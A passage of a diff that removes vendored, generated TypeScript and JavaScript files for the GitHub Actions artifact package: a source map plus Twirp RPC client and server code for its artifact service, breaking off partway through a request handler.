{"version":3,"file":"artifact.twirp-client.js","sourceRoot":"","sources":["../../../../../src/generated/results/api/v1/artifact.twirp-client.ts"],"names":[],"mappings":"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"}
|
||||||
48
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp.d.ts
generated
vendored
48
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp.d.ts
generated
vendored
@@ -1,48 +0,0 @@
|
|||||||
/// <reference types="node" />
|
|
||||||
import { TwirpContext, TwirpServer } from "twirp-ts";
|
|
||||||
import { CreateArtifactRequest, CreateArtifactResponse, FinalizeArtifactRequest, FinalizeArtifactResponse, ListArtifactsRequest, ListArtifactsResponse, GetSignedArtifactURLRequest, GetSignedArtifactURLResponse, DeleteArtifactRequest, DeleteArtifactResponse } from "./artifact";
|
|
||||||
interface Rpc {
|
|
||||||
request(service: string, method: string, contentType: "application/json" | "application/protobuf", data: object | Uint8Array): Promise<object | Uint8Array>;
|
|
||||||
}
|
|
||||||
export interface ArtifactServiceClient {
|
|
||||||
CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
|
||||||
FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
|
||||||
ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
|
||||||
GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
|
||||||
DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
|
||||||
}
|
|
||||||
export declare class ArtifactServiceClientJSON implements ArtifactServiceClient {
|
|
||||||
private readonly rpc;
|
|
||||||
constructor(rpc: Rpc);
|
|
||||||
CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
|
||||||
FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
|
||||||
ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
|
||||||
GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
|
||||||
DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
|
||||||
}
|
|
||||||
export declare class ArtifactServiceClientProtobuf implements ArtifactServiceClient {
|
|
||||||
private readonly rpc;
|
|
||||||
constructor(rpc: Rpc);
|
|
||||||
CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
|
||||||
FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
|
||||||
ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
|
||||||
GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
|
||||||
DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
|
||||||
}
|
|
||||||
export interface ArtifactServiceTwirp<T extends TwirpContext = TwirpContext> {
|
|
||||||
CreateArtifact(ctx: T, request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
|
||||||
FinalizeArtifact(ctx: T, request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
|
||||||
ListArtifacts(ctx: T, request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
|
||||||
GetSignedArtifactURL(ctx: T, request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
|
||||||
DeleteArtifact(ctx: T, request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
|
||||||
}
|
|
||||||
export declare enum ArtifactServiceMethod {
|
|
||||||
CreateArtifact = "CreateArtifact",
|
|
||||||
FinalizeArtifact = "FinalizeArtifact",
|
|
||||||
ListArtifacts = "ListArtifacts",
|
|
||||||
GetSignedArtifactURL = "GetSignedArtifactURL",
|
|
||||||
DeleteArtifact = "DeleteArtifact"
|
|
||||||
}
|
|
||||||
export declare const ArtifactServiceMethodList: ArtifactServiceMethod[];
|
|
||||||
export declare function createArtifactServiceServer<T extends TwirpContext = TwirpContext>(service: ArtifactServiceTwirp<T>): TwirpServer<ArtifactServiceTwirp<TwirpContext<import("http").IncomingMessage, import("http").ServerResponse<import("http").IncomingMessage>>>, T>;
|
|
||||||
export {};
|
|
||||||
508
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp.js
generated
vendored
508
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp.js
generated
vendored
@@ -1,508 +0,0 @@
|
|||||||
"use strict";
|
|
||||||
var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {
|
|
||||||
function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }
|
|
||||||
return new (P || (P = Promise))(function (resolve, reject) {
|
|
||||||
function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }
|
|
||||||
function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }
|
|
||||||
function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }
|
|
||||||
step((generator = generator.apply(thisArg, _arguments || [])).next());
|
|
||||||
});
|
|
||||||
};
|
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
|
||||||
exports.createArtifactServiceServer = exports.ArtifactServiceMethodList = exports.ArtifactServiceMethod = exports.ArtifactServiceClientProtobuf = exports.ArtifactServiceClientJSON = void 0;
|
|
||||||
const twirp_ts_1 = require("twirp-ts");
|
|
||||||
const artifact_1 = require("./artifact");
|
|
||||||
class ArtifactServiceClientJSON {
|
|
||||||
constructor(rpc) {
|
|
||||||
this.rpc = rpc;
|
|
||||||
this.CreateArtifact.bind(this);
|
|
||||||
this.FinalizeArtifact.bind(this);
|
|
||||||
this.ListArtifacts.bind(this);
|
|
||||||
this.GetSignedArtifactURL.bind(this);
|
|
||||||
this.DeleteArtifact.bind(this);
|
|
||||||
}
|
|
||||||
CreateArtifact(request) {
|
|
||||||
const data = artifact_1.CreateArtifactRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.CreateArtifactResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
FinalizeArtifact(request) {
|
|
||||||
const data = artifact_1.FinalizeArtifactRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
ListArtifacts(request) {
|
|
||||||
const data = artifact_1.ListArtifactsRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.ListArtifactsResponse.fromJson(data, { ignoreUnknownFields: true }));
|
|
||||||
}
|
|
||||||
GetSignedArtifactURL(request) {
|
|
||||||
const data = artifact_1.GetSignedArtifactURLRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
DeleteArtifact(request) {
|
|
||||||
const data = artifact_1.DeleteArtifactRequest.toJson(request, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
});
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/json", data);
|
|
||||||
return promise.then((data) => artifact_1.DeleteArtifactResponse.fromJson(data, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
}));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
exports.ArtifactServiceClientJSON = ArtifactServiceClientJSON;
|
|
||||||
class ArtifactServiceClientProtobuf {
|
|
||||||
constructor(rpc) {
|
|
||||||
this.rpc = rpc;
|
|
||||||
this.CreateArtifact.bind(this);
|
|
||||||
this.FinalizeArtifact.bind(this);
|
|
||||||
this.ListArtifacts.bind(this);
|
|
||||||
this.GetSignedArtifactURL.bind(this);
|
|
||||||
this.DeleteArtifact.bind(this);
|
|
||||||
}
|
|
||||||
CreateArtifact(request) {
|
|
||||||
const data = artifact_1.CreateArtifactRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.CreateArtifactResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
FinalizeArtifact(request) {
|
|
||||||
const data = artifact_1.FinalizeArtifactRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
ListArtifacts(request) {
|
|
||||||
const data = artifact_1.ListArtifactsRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.ListArtifactsResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
GetSignedArtifactURL(request) {
|
|
||||||
const data = artifact_1.GetSignedArtifactURLRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
DeleteArtifact(request) {
|
|
||||||
const data = artifact_1.DeleteArtifactRequest.toBinary(request);
|
|
||||||
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/protobuf", data);
|
|
||||||
return promise.then((data) => artifact_1.DeleteArtifactResponse.fromBinary(data));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
exports.ArtifactServiceClientProtobuf = ArtifactServiceClientProtobuf;
|
|
||||||
var ArtifactServiceMethod;
|
|
||||||
(function (ArtifactServiceMethod) {
|
|
||||||
ArtifactServiceMethod["CreateArtifact"] = "CreateArtifact";
|
|
||||||
ArtifactServiceMethod["FinalizeArtifact"] = "FinalizeArtifact";
|
|
||||||
ArtifactServiceMethod["ListArtifacts"] = "ListArtifacts";
|
|
||||||
ArtifactServiceMethod["GetSignedArtifactURL"] = "GetSignedArtifactURL";
|
|
||||||
ArtifactServiceMethod["DeleteArtifact"] = "DeleteArtifact";
|
|
||||||
})(ArtifactServiceMethod || (exports.ArtifactServiceMethod = ArtifactServiceMethod = {}));
|
|
||||||
exports.ArtifactServiceMethodList = [
|
|
||||||
ArtifactServiceMethod.CreateArtifact,
|
|
||||||
ArtifactServiceMethod.FinalizeArtifact,
|
|
||||||
ArtifactServiceMethod.ListArtifacts,
|
|
||||||
ArtifactServiceMethod.GetSignedArtifactURL,
|
|
||||||
ArtifactServiceMethod.DeleteArtifact,
|
|
||||||
];
|
|
||||||
function createArtifactServiceServer(service) {
|
|
||||||
return new twirp_ts_1.TwirpServer({
|
|
||||||
service,
|
|
||||||
packageName: "github.actions.results.api.v1",
|
|
||||||
serviceName: "ArtifactService",
|
|
||||||
methodList: exports.ArtifactServiceMethodList,
|
|
||||||
matchRoute: matchArtifactServiceRoute,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
exports.createArtifactServiceServer = createArtifactServiceServer;
|
|
||||||
function matchArtifactServiceRoute(method, events) {
|
|
||||||
switch (method) {
|
|
||||||
case "CreateArtifact":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "CreateArtifact" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceCreateArtifactRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "FinalizeArtifact":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "FinalizeArtifact" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceFinalizeArtifactRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "ListArtifacts":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "ListArtifacts" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceListArtifactsRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "GetSignedArtifactURL":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "GetSignedArtifactURL" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceGetSignedArtifactURLRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
case "DeleteArtifact":
|
|
||||||
return (ctx, service, data, interceptors) => __awaiter(this, void 0, void 0, function* () {
|
|
||||||
ctx = Object.assign(Object.assign({}, ctx), { methodName: "DeleteArtifact" });
|
|
||||||
yield events.onMatch(ctx);
|
|
||||||
return handleArtifactServiceDeleteArtifactRequest(ctx, service, data, interceptors);
|
|
||||||
});
|
|
||||||
default:
|
|
||||||
events.onNotFound();
|
|
||||||
const msg = `no handler found`;
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceCreateArtifactRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceCreateArtifactJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceCreateArtifactProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceFinalizeArtifactRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceFinalizeArtifactJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceFinalizeArtifactProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceListArtifactsRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceListArtifactsJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceListArtifactsProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceGetSignedArtifactURLRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceGetSignedArtifactURLJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceGetSignedArtifactURLProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceDeleteArtifactRequest(ctx, service, data, interceptors) {
|
|
||||||
switch (ctx.contentType) {
|
|
||||||
case twirp_ts_1.TwirpContentType.JSON:
|
|
||||||
return handleArtifactServiceDeleteArtifactJSON(ctx, service, data, interceptors);
|
|
||||||
case twirp_ts_1.TwirpContentType.Protobuf:
|
|
||||||
return handleArtifactServiceDeleteArtifactProtobuf(ctx, service, data, interceptors);
|
|
||||||
default:
|
|
||||||
const msg = "unexpected Content-Type";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.BadRoute, msg);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
function handleArtifactServiceCreateArtifactJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.CreateArtifactRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.CreateArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.CreateArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.CreateArtifactResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceFinalizeArtifactJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.FinalizeArtifactRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.FinalizeArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.FinalizeArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.FinalizeArtifactResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceListArtifactsJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.ListArtifactsRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.ListArtifacts(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.ListArtifacts(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.ListArtifactsResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceGetSignedArtifactURLJSON(ctx, service, data, interceptors) {
|
|
||||||
